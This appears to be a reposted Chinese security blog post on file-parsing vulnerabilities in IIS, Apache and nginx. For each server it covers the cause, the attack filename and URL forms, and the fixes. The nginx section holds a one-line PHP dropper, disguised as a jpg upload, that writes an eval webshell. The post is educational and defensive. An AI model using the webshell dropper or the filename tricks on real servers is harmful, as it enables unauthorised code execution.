典型漏洞概括之解析漏洞

0x00 總覽說明

服務器解析漏洞算是歷史比較悠久了，但現在依然普遍存在。在此記錄彙總一些常見服務器（WEB server）的解析漏洞，好比IIS6.0、IIS7.五、apache、nginx等方便之後回顧溫習。

from:http://thief.one/2016/09/21/%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%BC%8F%E6%B4%9E/

 

 

0x01 概括總結

（一）IIS5.x-6.x解析漏洞

使用iis5.x-6.x版本的服務器，大多爲windows server 2003，網站比較古老，開發語句通常爲asp；該解析漏洞也只能解析asp文件，而不能解析aspx文件。

目錄解析(6.0)

形式：www.xxx.com/xx.asp/xx.jpg
原理: 服務器默認會把.asp，.asa目錄下的文件都解析成asp文件。

文件解析

形式：www.xxx.com/xx.asp;.jpg
原理：服務器默認不解析;號後面的內容，所以xx.asp;.jpg便被解析成asp文件了。

解析文件類型

IIS6.0 默認的可執行文件除了asp還包含這三種 :

/test.asa
/test.cer
/test.cdx

修復方案

1.目前尚無微軟官方的補丁，能夠經過本身編寫正則，阻止上傳xx.asp;.jpg類型的文件名。
2.作好權限設置，限制用戶建立文件夾。

 

（二）apache解析漏洞

漏洞原理

　　Apache 解析文件的規則是從右到左開始判斷解析,若是後綴名爲不可識別文件解析,就再往左判斷。好比 test.php.owf.rar 「.owf」和」.rar」 這兩種後綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php。

漏洞形式

www.xxxx.xxx.com/test.php.php123

其他配置問題致使漏洞

（1）若是在 Apache 的 conf 裏有這樣一行配置 AddHandler php5-script .php 這時只要文件名裏包含.php 即便文件名是 test2.php.jpg 也會以 php 來執行。
（2）若是在 Apache 的 conf 裏有這樣一行配置 AddType application/x-httpd-php .jpg 即便擴展名是 jpg，同樣能以 php 方式執行。

修復方案

1.apache配置文件，禁止.php.這樣的文件執行，配置文件裏面加入

<Files ~ 「.(php.|php3.)」>
        Order Allow,Deny
        Deny from all
</Files>

2.用僞靜態能解決這個問題，重寫相似.php.*這類文件，打開apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so
把#號去掉，重啓apache,在網站根目錄下創建.htaccess文件,代碼以下:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
</IfModule>

（三）nginx解析漏洞

漏洞原理

　　Nginx默認是以CGI的方式支持PHP解析的，廣泛的作法是在Nginx配置文件中經過正則匹配設置SCRIPT_FILENAME。當訪問www.xx.com/phpinfo.jpg/1.php這個URL時，$fastcgi_script_name會被設置爲「phpinfo.jpg/1.php」，而後構形成SCRIPT_FILENAME傳遞給PHP CGI，可是PHP爲何會接受這樣的參數，並將phpinfo.jpg做爲PHP文件解析呢?這就要說到fix_pathinfo這個選項了。 若是開啓了這個選項，那麼就會觸發在PHP中的以下邏輯：

PHP會認爲SCRIPT_FILENAME是phpinfo.jpg，而1.php是PATH_INFO，因此就會將phpinfo.jpg做爲PHP文件來解析了

漏洞形式

www.xxxx.com/UploadFiles/image/1.jpg/1.php
www.xxxx.com/UploadFiles/image/1.jpg%00.php
www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php

xxx.jpg%00.php (Nginx <8.03 空字節代碼執行漏洞)

另一種手法：上傳一個名字爲test.jpg，如下內容的文件。

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

而後訪問test.jpg/.php,在這個目錄下就會生成一句話木馬shell.php。

 使用phpstudy測試，默認配置便可（雖然默認的cgi.fix_pathinfo是註釋狀態，但的確默認值爲1）。nginx版本1.11.5 （可見並非）

 

 

修復方案

1.修改php.ini文件，將cgi.fix_pathinfo的值設置爲0;
2.在Nginx配置文件中添加如下代碼：

if ( $fastcgi_script_name ~ ..*/.*php ) {
return 403;
}

這行代碼的意思是當匹配到相似test.jpg/a.php的URL時，將返回403錯誤代碼。

（四）IIS7.5解析漏洞

IIS7.5的漏洞與nginx的相似，都是因爲php配置文件中，開啓了cgi.fix_pathinfo，而這並非nginx或者iis7.5自己的漏洞。

PS: a.aspx.a;.a.aspx.jpg..jpg